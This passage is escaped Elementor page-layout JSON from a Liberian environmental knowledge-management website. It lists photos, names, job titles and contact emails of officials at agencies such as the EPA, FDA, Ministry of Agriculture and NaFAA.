"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a 